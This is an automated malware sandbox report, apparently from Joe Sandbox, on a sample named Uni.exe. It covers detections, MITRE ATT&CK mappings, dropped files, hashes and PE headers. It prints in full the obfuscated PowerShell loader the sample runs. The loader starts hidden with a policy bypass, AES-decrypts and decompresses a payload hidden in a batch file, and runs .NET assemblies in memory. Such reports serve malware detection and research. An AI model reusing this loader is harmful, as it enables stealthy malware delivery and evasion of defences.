Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fvoxt($opfne){ $ilier=[system.security.cryptography.aes]::create(); $ilier.mode=[system.security.cryptography.ciphermode]::cbc; $ilier.padding=[system.security.cryptography.paddingmode]::pkcs7; $ilier.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rebxu8mwh2apsy80ruiy+qal9/pmltefd4yzeco07u8='); $ilier.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('scyrvuoynjwrzxky6x630g=='); $apxpi=$ilier.createdecryptor(); $return_var=$apxpi.transformfinalblock($opfne, 0, $opfne.length); $apxpi.dispose(); $ilier.dispose(); $return_var;}function wmmyx($opfne){ $toqfi=new-object system.io.memorystream(,$opfne); $livgb=new-object system.io.memorystream; $glywg=new-object system.io.compression.gzipstream($toqfi, [io.compression.compressionmode]::decompress); $glywg.copyto($livgb); $glywg.dispose(); $toqfi.dispose(); $livgb.dispose(); $livgb.toarray();}function ahakz($opfne,$xbfqp){ $taiwf=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$opfne); $jzvro=$taiwf.entrypoint; $jzvro.invoke($null, $xbfqp);}$zxjef=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user~1\appdata\local\temp\ixp000.tmp\uni.bat').split([environment]::newline);foreach ($faxqr in $zxjef) { if ($faxqr.startswith('seroxen')) { $myvzj=$faxqr.substring(7); break; }}$tsyru=[string[]]$myvzj.split('\');$wdicd=wmmyx (fvoxt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($tsyru[0])));$efigo=wmmyx (fvoxt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($tsyru[1])));ahakz $efigo (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));ahakz $wdicd (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fvoxt($opfne){ $ilier=[system.security.cryptography.aes]::create(); $ilier.mode=[system.security.cryptography.ciphermode]::cbc; $ilier.padding=[system.security.cryptography.paddingmode]::pkcs7; $ilier.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rebxu8mwh2apsy80ruiy+qal9/pmltefd4yzeco07u8='); $ilier.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('scyrvuoynjwrzxky6x630g=='); $apxpi=$ilier.createdecryptor(); $return_var=$apxpi.transformfinalblock($opfne, 0, $opfne.length); $apxpi.dispose(); $ilier.dispose(); $return_var;}function wmmyx($opfne){ $toqfi=new-object system.io.memorystream(,$opfne); $livgb=new-object system.io.memorystream; $glywg=new-object system.io.compression.gzipstream($toqfi, [io.compression.compressionmode]::decompress); $glywg.copyto($livgb); $glywg.dispose(); $toqfi.dispose(); $livgb.dispose(); $livgb.toarray();}function ahakz($opfne,$xbfqp){ $taiwf=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$opfne); $jzvro=$taiwf.entrypoint; $jzvro.invoke($null, $xbfqp);}$zxjef=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user~1\appdata\local\temp\ixp000.tmp\uni.bat').split([environment]::newline);foreach ($faxqr in $zxjef) { if ($faxqr.startswith('seroxen')) { $myvzj=$faxqr.substring(7); break; }}$tsyru=[string[]]$myvzj.split('\');$wdicd=wmmyx (fvoxt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($tsyru[0])));$efigo=wmmyx (fvoxt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($tsyru[1])));ahakz $efigo (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));ahakz $wdicd (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Uni.exe

Code function: 0_2_00007FF7A08C18E4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

0_2_00007FF7A08C18E4

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Uni.exe	58%	Virustotal		Browse
Uni.exe	37%	ReversingLabs	Win64.Trojan.Generic
Uni.exe	100%	Avira	TR/Ransom.uirtd

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	0%	ReversingLabs

Name	Source	Malicious	Reputation
https://aka.ms/pscore6	Uni.bat.exe, 00000005.00000002.1414374047.0000016FC28E3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	Uni.bat.exe, 00000005.00000002.1414374047.0000016FC2935000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Uni.bat.exe, 00000005.00000002.1414374047.0000016FC295C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575686
Start date and time:	2024-12-16 08:29:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Uni.exe
Detection:	MAL
Classification:	mal88.evad.winEXE@7/6@0/0
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Uni.bat.exe, PID 7680 because it is empty
Execution Graph export aborted for target Uni.exe, PID 7432 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse
	rPO767575.cmd	Get hash	malicious	DBatLoader	Browse
	Social_Security_Statement_Review.vbs	Get hash	malicious	Unknown	Browse
	Pollosappnuevo.bat	Get hash	malicious	XWorm	Browse
	PollosAplicaccion.bat	Get hash	malicious	XWorm	Browse
	gcapi64.cmd	Get hash	malicious	Unknown	Browse
	fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll	Get hash	malicious	Unknown	Browse
	fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	BrowserUpdater.lnk	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.bat.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2667
Entropy (8bit):	5.3546132390144345
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6o6+ztYsTzHNpDHmAHKKkWHKmHKe6ftHTHq+0trK7mHKwl9:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHK
MD5:	A477C52686412872F51E6EADC0EE00E8
SHA1:	97AF03D2CD45488E73DCB72720F6EB704DB687B6
SHA-256:	9478FEA68BD400729D6132BC0D47527BE473E45F64C17C4568F655C188EA3C6A
SHA-512:	BF00A82630532385C5A9E1C7B2B95C6E09AB671E8D59A9129837A763F9A44C654ACE578F15F27A4FEF1CB01A800FAB850A6FAD85272ABB26EFA87442F320A52A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.773832331134527
Encrypted:	false
SSDEEP:	3:Nlllul2t:NllU
MD5:	0B1B8E17F797EF2950061461C7171DD2
SHA1:	7A2E520E732C1A3A00416C73070BB0D241DA6C16
SHA-256:	E0DC80903C4BADE9E2CE430894D4FE236D2A2C786356E4AC4071E59493736E26
SHA-512:	B04D2DE1BC0BF7825107727FA2546ACFD29EBC80245F6657212A9B4AB3C5544EDCAFE9080EE054B23AE4EAB06CD3BB564718A1DB4052F3ECD4195F1E06E4FE82
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat

Download File

Process:	C:\Users\user\Desktop\Uni.exe
File Type:	ASCII text, with very long lines (4949), with CRLF line terminators
Category:	modified
Size (bytes):	13148346
Entropy (8bit):	6.035078220239148
Encrypted:	false
SSDEEP:	49152:e7Ff6UVJnzaJ874Vs/cHZhDf2RuE2eQ34Sosgm3Vr48GZibGxTQdIgACtk1i6/Sz:b
MD5:	A4F9A8D05619CB7BCD36DE94CCE00098
SHA1:	FD23538B08C68E5B1229FB6CFF001153842EBDAD
SHA-256:	6DB8FF4761350CCE286A0D448258B05BF0575C3A751B5A4EFB6957EF691E167B
SHA-512:	0EC6E105196B4AD72085B5E0A515620AABB7167A3932FCC0500AC34E184CABBF24A03242A7CBF66937E043DDD467AA5AA1CBE24A01F57A80B83376057805A809
Malicious:	true
Reputation:	low
Preview:	%pOXfDrjuWnhcSRdkMkHqmaUPfroTVBNoAVYomdjVHMRoImBQvgBiVCfNuIAKCPWUYrcwrnxgBkiYJdHqqXYnAdRxpKvdcYSqoxPOJEXFiSgkRFEOAIRcohUvYfFguRDaQqjLNqhlATEfxgdjFdcUGoCGZUobzpKQPFSZUqAHYfbUcoxqATaNmhUanbkrBEmIImOpMENMdVvYLgbkWybcNxbhjqkqGGFTrTLoYFdwFOiQlvOHAAUDaIvLJgFTSVFWPYgqUlKQSgWzMLvobbqGkCriXzfrzJaiIKBLMWlNnDjvjvyykPqodzlMgyRUFRQIEnpCJibEpbQgRxycAhGiQlEJXmdNFQHVlZpwDwmClmzBgFvizmTWKgqQigcVENzYUuvpGCYEvDwclDaSqvOQwiLEiXMVRPyWmYfmJEaxNObGkMcfEKcIzhbkhoHhnClcFWoMWnImRQCfGESUufQHlnXFwuFTwuHKbzBMVQIPBophdwcbVlnIkdqPzjQbinqXIqDHDGybWBFwypYzOaxJFzYyGjMlAdgMyQX%..%pOXfDrjuWnhcSRdkMkHqmaUPfroTVBNoAVYomdjVHMRoImBQvgBiVCfNuIAKCPWUYrcwrnxgBkiYJdHqqXYnAdRxpKvdcYSqoxPOJEXFiSgkRFEOAIRcohUvYfFguRDaQqjLNqhlATEfxgdjFdcUGoCGZUobzpKQPFSZUqAHYfbUcoxqATaNmhUanbkrBEmIImOpMENMdVvYLgbkWybcNxbhjqkqGGFTrTLoYFdwFOiQlvOHAAUDaIvLJgFTSVFWPYgqUlKQSgWzMLvobbqGkCriXzfrzJaiIKBLMWlNnDjvjvyykPqodzlMgyRUFRQIEnpCJibEpbQgRxycAhGiQlEJXmdNFQHVlZpwDwmClmzBgFvizmTWKgqQigcVENzYUuvpGCYEvDwclDaSqvOQwiLEiXMVRPyWmYfmJEaxNObGkMcfEKcIzhbkhoHhnClc

C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	452608
Entropy (8bit):	5.459268466661775
Encrypted:	false
SSDEEP:	6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
MD5:	04029E121A0CFA5991749937DD22A1D9
SHA1:	F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
SHA-256:	9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
SHA-512:	6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SplpM1fFkV.exe, Detection: malicious, Browse Filename: rPO767575.cmd, Detection: malicious, Browse Filename: Social_Security_Statement_Review.vbs, Detection: malicious, Browse Filename: Pollosappnuevo.bat, Detection: malicious, Browse Filename: PollosAplicaccion.bat, Detection: malicious, Browse Filename: gcapi64.cmd, Detection: malicious, Browse Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: BrowserUpdater.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4absxr2.njg.psm1

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svkgjrep.zh0.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.994824502130146
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Uni.exe
File size:	8'581'120 bytes
MD5:	917c0479804b76ae493bad95bf0c7710
SHA1:	7441c9042a3db3642416bd1fbee680e41fed6000
SHA256:	00f80131b00550bd8cbc45ea7f064b75c4b19fb2df93200f359593c3f5fc54f4
SHA512:	93ca248c62caa51a81a5156674ce4eceddc7c2bfd9331a8d522528d80b0d42042957e152e63021f9c3c6696ec76cbaec2ec5bc2820f5c0caf4976040e99d3aa8
SSDEEP:	196608:szdoXA+DYyx8t5KwwFdR3TNpiCHK9MIuBRR23pyHVvGAE+:szUDh8t55wFd1NckKKH+3pyHU
TLSH:	6786330937E67560E470477848A71AC2F1373E277F2050EF8856271A19277CA367AFAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._............."

File Icon


Icon Hash:	3b6120282c4c5a1f

Static PE Info

General

Entrypoint:	0x140001150
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	4cea7ae85c87ddc7295d39ff9cda31d1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F18A8C00A50h
dec eax
add esp, 28h
jmp 00007F18A8C002CBh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000082A5h]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [0000B9D2h], ebx
je 00007F18A8C002CCh
dec eax
cmp eax, ebx
jne 00007F18A8C002DFh
mov edi, 00000001h
mov eax, dword ptr [0000B9C8h]
cmp eax, 01h
jne 00007F18A8C002DCh
lea ecx, dword ptr [eax+1Eh]
call 00007F18A8C008E4h
jmp 00007F18A8C00349h
mov ecx, 000003E8h
call dword ptr [00008253h]
jmp 00007F18A8C00286h
mov eax, dword ptr [0000B9A3h]
test eax, eax
jne 00007F18A8C00325h
mov dword ptr [0000B995h], 00000001h
dec esp
lea esi, dword ptr [000084DEh]
dec eax
lea ebx, dword ptr [000084BFh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007F18A8C002F1h
test eax, eax
jne 00007F18A8C002F1h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007F18A8C002DCh
dec ecx
mov edx, 5E523070h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa394	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf000	0x81f7ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xe000	0x444	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x82f000	0x30	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a78	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9010	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9150	0x520	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7eb0	0x8000	8f5ddc5fa0c3119d30f7e00d7bfd48aa	False	0.547576904296875	data	6.109997796878264	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2420	0x3000	79a5acf192c71ab3579d24a79e81e45b	False	0.3240559895833333	data	3.9065058401206216	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x1f00	0x1000	f198899505f620007167379f74f8141c	False	0.083251953125	data	1.0384025678015962	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
